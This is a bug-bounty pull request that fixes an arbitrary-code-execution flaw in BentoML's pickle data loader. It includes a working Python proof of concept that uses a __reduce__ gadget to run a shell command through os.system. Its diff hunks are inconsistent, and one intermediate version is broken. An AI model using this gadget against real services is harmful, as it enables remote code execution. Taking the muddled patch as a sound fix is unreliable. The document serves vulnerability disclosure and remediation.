### PR TITLE
Fixed Arbitrary code execution in BentoML

### DIFF
--- a/bentoml/marshal/utils.py
+++ b/bentoml/marshal/utils.py
@@ -90,7 +90,8 @@ class PickleDataLoader:
 
     @classmethod
     def split_requests(cls, raw: bytes) -> Sequence[HTTPRequest]:
-        return pickle.loads(restricted_loads(raw))
+        restricted_loads(raw)
+        return pickle.loads(raw)
 
     @classmethod
     def merge_responses(cls, resps: Sequence[HTTPResponse]) -> bytes:

--- a/bentoml/marshal/utils.py
+++ b/bentoml/marshal/utils.py
@@ -2,7 +2,7 @@ import pickle
 from functools import lru_cache
 from typing import Sequence
 
-import bentoml.config as bentoml_config
+from bentoml import config as bentoml_config
 from bentoml.types import HTTPRequest, HTTPResponse
 
 BATCH_REQUEST_HEADER = bentoml_config("apiserver").get("batch_request_header")

--- a/bentoml/marshal/utils.py
+++ b/bentoml/marshal/utils.py
@@ -90,7 +90,7 @@ class PickleDataLoader:
 
     @classmethod
     def split_requests(cls, raw: bytes) -> Sequence[HTTPRequest]:
-        return restricted_loads(pickle.loads(raw))
+        return pickle.loads(restricted_loads(raw))
 
     @classmethod
     def merge_responses(cls, resps: Sequence[HTTPResponse]) -> bytes:


### PR DESCRIPTION
### 📊 Metadata *
Fixed Arbitrary code execution in ```BentoML```

#### Bounty URL: https://www.huntr.dev/bounties/1-pip-BentoML

### ⚙️ Description *
```BentoML``` is a framework for serving, managing, and deploying machine learning models. It is aiming to bridge the gap between Data Science and DevOps, and enable teams to deliver prediction services in a fast, repeatable, and scalable way.

 Vulnerability discription untrusded loading of data by the ```picle.load``` function leading to ```Arbitrary code execution```.

### 💻 Technical Description *
The function ```split_requests()``` from class ```PickleDataLoader``` blindly loads a pickle file without any validation making it vulnerable to ```Arbitrary Code Execution```. If the input pickle file is a malicious payload,  create a file remotely.
### 🐛 Proof of Concept (PoC) *
```python
# exploit.py
import os
import pickle
#setup
os.system('pip install bentoml')
from bentoml.marshal.utils import PickleDataLoader
#payload formation
class ArbitrarcyCode:
    def __reduce__(self):
        cmd = ('echo "HACKED" > hacked')
        return os.system, (cmd,)
#serilizing payload
dumps = pickle.dumps(ArbitrarcyCode())
#exploiting bentoml
PickleDataLoader.split_requests(dumps)
```
![Screenshot 2021-01-06 203720](https://user-images.githubusercontent.com/29670330/103783785-28b50800-505f-11eb-8708-b0e6417ef0fe.png)

### 🔥 Proof of Fix (PoF) *
![Screenshot 2021-01-06 203807](https://user-images.githubusercontent.com/29670330/103783808-2e125280-505f-11eb-92fd-bdec0a9cf3ea.png)

When subprocess is called.
![Screenshot 2021-01-06 204009](https://user-images.githubusercontent.com/29670330/103783998-703b9400-505f-11eb-9278-8ddccbe9b424.png)


### 👍 User Acceptance Testing (UAT)
Applied fix from pickle official fix as explained in here.
https://www.cmi.ac.in/~madhavan/courses/python-2014/docs/python-3.2.1-docs-html/library/pickle.html
Proper working
![Screenshot 2021-01-07 110402](https://user-images.githubusercontent.com/29670330/103855173-217e1080-50d8-11eb-8393-bb2e5713eb45.png)


